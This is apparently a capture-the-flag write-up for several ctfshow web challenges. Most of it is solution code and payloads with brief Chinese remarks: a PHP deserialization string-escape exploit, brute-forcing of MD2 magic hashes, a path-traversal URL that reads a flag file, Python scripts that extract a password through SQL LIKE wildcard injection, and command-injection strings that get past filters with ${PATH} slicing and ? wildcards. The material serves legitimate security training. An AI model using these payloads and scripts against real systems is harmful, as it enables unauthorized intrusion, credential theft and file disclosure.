1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<?php
error_reporting(0);

class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

1
2
3
4
5
6
7

<?php
class a{
    public $uname='1';
	public $password='yu22x';
}
echo serialize(new a());
//O:1:"a":2:{s:5:"uname";s:1:"1";s:8:"password";s:5:"yu22x";}

1
2

print(len('";s:8:"password";s:5:"yu22x";}'))
# 30

1

print(15*"Firebasky"+'";s:8:"password";s:5:"yu22x";}')

1
2
3
4
5
6
7
8
9

User=agent:   *
Disallow:
Disallow:   hinthint.txt
然后访问得到
Is it particularly difficult to break MD2?!
I'll tell you quietly that I saw the payoad of the author.
But the numbers are not clear.have fun~~~~
xxxxx024452    hash("md2",$b)
xxxxxx48399    hash("md2",hash("md2",$b))

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

<?php
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['a'];
$b=$_GET['b'];
$c=$_GET['c'];
$url[1]=$_POST['url'];
if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0){
    $d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));
    if($d){
             highlight_file('hint.php');
             if(filter_var($url[1],FILTER_VALIDATE_URL)){
                $host=parse_url($url[1]);
                print_r($host); 
                if(preg_match('/ctfshow\.com$/',$host['host'])){
                    print_r(file_get_contents($url[1]));
                }else{
                    echo '差点点就成功了！';
                }
            }else{
                echo 'please give me url!!!';
            }     
    }else{
        echo '想一想md5碰撞原理吧?!';
    }
}else{
    echo '第一个都过不了还想要flag呀?!';
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

<?php
for($i=0;$i<9999;$i++){
    $b='0e'.$i.'024452';
    if($b==hash("md2",$b)){
        echo $b;
        break;
    }
}
echo "\n";
for($j=0;$j<9999;$j++){
    $c='0e'.$j.'48399';
    if($c==hash("md2",hash("md2", $c))){
        echo $c;
        break;
    }
}
/*
0e652024452
0e603448399

1
2

<?php 
$flag="flag in /fl0g.txt";

1
2
3

?a=1e-200&b=0e652024452&c=0e603448399
POST:
url=wo://ctfshow.com/../../../../../fl0g.txt

1
2
3

<!--注意：正式上线请删除注释内容！ -->
<!-- username yu22x -->
<!-- SELECT * FROM users where username like binary('$username') and password like binary('$password')-->

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

import requests

url="http://1f701f35-a402-4f51-a2c9-5967cea01f50.challenge.ctf.show/login.php"
j='_'
for i in range(50):

    data={'username':'yu22x','password':j}
    r=requests.post(url=url,data=data)
    if "wrong username or password" in r.text:
        j+='_'
    else:
        print(len(j))
        break
        
# 32        

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

import requests
import string

str=string.digits+string.ascii_letters
url="http://1f701f35-a402-4f51-a2c9-5967cea01f50.challenge.ctf.show/login.php"
target=""

for i in range(32):
    for j in str:
        password=target+j+(31-i)*'_'
        data={'username':'yu22x','password':password}
        r=requests.post(url=url,data=data)
        if 'wrong username or password' not in r.text:
            target+=j
            print("\r"+target,end="")
            break

# 67815b0c009ee970fe4014abaa3Fa6A0

1
2
3
4

127.0.0.1;${PATH:5:1}${PATH:2:1}

*被过滤，用?
127.0.0.1;${PATH:14:1}${PATH:5:1} ????.???